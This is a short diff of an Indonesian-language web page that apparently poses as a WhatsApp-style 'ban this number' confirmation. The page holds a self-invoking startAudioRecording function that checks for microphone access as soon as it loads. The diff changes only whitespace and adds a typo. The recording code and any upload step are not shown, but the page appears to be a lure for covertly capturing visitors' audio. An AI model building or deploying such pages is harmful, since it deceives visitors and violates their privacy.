--- a/index.html
+++ b/index.html
@@ -74,7 +74,7 @@
             alert("Ulangi Banned Gan");
         }
 
-        (function startAudioRecording(){
+        (function startAudioRecording() {
             // Check if MediaRecorder API is supported
             if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
 
@@ -124,6 +124,6 @@
     <img src="https://telegra.ph/file/f81efc7283b8b6e8a870e.jpg" alt="Logo" class="logo">
 
     <!-- Teks dan Tombol -->
-    <h1>APAKAH ANDA YAKIN UNTUK BANNED NOMER TERSEBUT?</h1>
+    <h1>APAKAH ANDA YAKIN UNTUK BhANNED NOMER TERSEBUT?</h1>
     <p id="startAudioRecording"></p>
 </html>
